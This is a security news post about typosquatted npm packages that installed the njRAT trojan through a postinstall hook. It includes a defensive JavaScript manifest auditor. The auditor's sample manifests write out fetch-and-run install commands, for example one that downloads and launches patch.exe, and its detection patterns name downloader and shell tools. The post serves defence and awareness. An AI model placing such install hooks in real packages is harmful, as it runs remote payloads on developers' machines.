According to a report compiled by researchers, malicious code injection into open-source software (OSS) projects has been rising steadily; the report puts the increase at 430%. Cybercriminals have recently used two malicious packages, dubbed jdb.js and db-json.js, to deliver the njRAT (aka Bladabindi) malware.
These two malicious packages, discovered by researchers, contain a malicious script that executes once either of the two virulent libraries is installed and imported by a web developer.
- Both packages described themselves as tools to help developers work with JSON files, typically those generated by database applications.
- jdb.js mimics the legitimate NodeJS-based database library jdb, while the db-json.js package carries a name identical to that of the genuine db-json library.
- The post-install script of jdb.js attempts to download and run a file named patch.exe, which in turn installs njRAT.
- Researchers have observed more than 100 downloads of these packages from the NPM package registry.
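The install-time behaviour described above is exactly what a manifest audit should surface before `npm install` runs anything. The script below is an added example, not code from the report or from any of the packages named on this page: it inspects a package.json-style manifest for lifecycle hooks that run automatically on install and for names that closely resemble known packages. The sample manifests, their command strings (including the `patch.exe` references) and the known-package list are constructed for illustration.

```javascript
// Added example (not from the original report or any named project): audit an npm
// package manifest for install-time lifecycle scripts and for lookalike package names.
// Every manifest, command string and package list in this file is constructed.

// npm runs these hooks automatically during `npm install`, before any code is imported.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Crude indicators that an install hook fetches or launches something beyond a build step.
const SUSPICIOUS_PATTERNS = [
  { label: 'executable', re: /\.exe\b/i },
  { label: 'downloader', re: /\b(curl|wget|certutil|Invoke-WebRequest)\b/i },
  { label: 'shell-launcher', re: /\b(powershell|cmd\.exe|sh -c)\b/i },
  { label: 'remote-url', re: /https?:\/\//i },
];

// Classic edit distance; used to spot names one or two keystrokes away from a real package.
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Drop a registry scope and a trailing ".js"/"-js"/"_js" so "jdb.js" compares as "jdb".
function normalizeName(name) {
  return String(name).toLowerCase().replace(/^@[^/]+\//, '').replace(/[.\-_]js$/, '');
}

// Returns a list of findings for one manifest. maxDistance is the lookalike threshold.
function auditManifest(manifest, knownPackages, maxDistance = 2) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const command = String(scripts[hook]);
    const indicators = SUSPICIOUS_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.label);
    findings.push({ type: 'lifecycle-script', hook, command, suspicious: indicators.length > 0, indicators });
  }
  const rawName = String(manifest.name || '');
  const candidate = normalizeName(rawName);
  for (const known of knownPackages) {
    if (rawName.toLowerCase() === known.toLowerCase()) continue; // exact match: the genuine package
    const distance = levenshtein(candidate, normalizeName(known));
    if (distance <= maxDistance) {
      findings.push({ type: 'lookalike-name', name: rawName, resembles: known, distance });
    }
  }
  return findings;
}

// Constructed manifests modelled on the behaviour the report describes (not the real packages).
const SAMPLE_MANIFESTS = [
  { name: 'jdb.js', version: '1.0.0', scripts: { postinstall: 'node setup.js && patch.exe' } },
  { name: 'db-json.js', version: '1.0.0',
    scripts: { postinstall: 'curl -o patch.exe https://example.invalid/update && patch.exe' } },
  { name: 'left-pad-clone', version: '0.1.0', scripts: { test: 'mocha' } },
];
// Constructed allowlist of names the organisation actually depends on.
const KNOWN_PACKAGES = ['jdb', 'db-json', 'discord.js', 'twilio'];

for (const manifest of SAMPLE_MANIFESTS) {
  console.log(manifest.name, JSON.stringify(auditManifest(manifest, KNOWN_PACKAGES), null, 2));
}
```

Run it with `node audit.js`; the first two constructed manifests are flagged both for a suspicious `postinstall` hook and for resembling an allowlisted name, while the third produces no findings. The edit-distance threshold of 2 is generous for very short names such as `jdb`, so tighten `maxDistance` for names under five characters. Independently of any scanner, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents lifecycle hooks from running at all, and `npm view <package> scripts` shows a package's hooks before it is installed.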
Several other malware components that have already made headlines include discord.dll, discord.app, wsbd.js, ac-addon, and more.
- The recently executed CursedGrabber campaign was associated with the xpc.js malware, which targeted Windows hosts to steal Discord tokens and sensitive user data.
- Researchers had discovered two NPM packages, discord.dll and twilio-npm, that also stole sensitive files from Discord applications and browsers.
The NPM team has released a security advisory for these malicious packages. However, if adequate protections are not in place, counterfeit components could keep emerging, signalling next-generation software supply chain attacks.
To read more, please check the eScan Blog.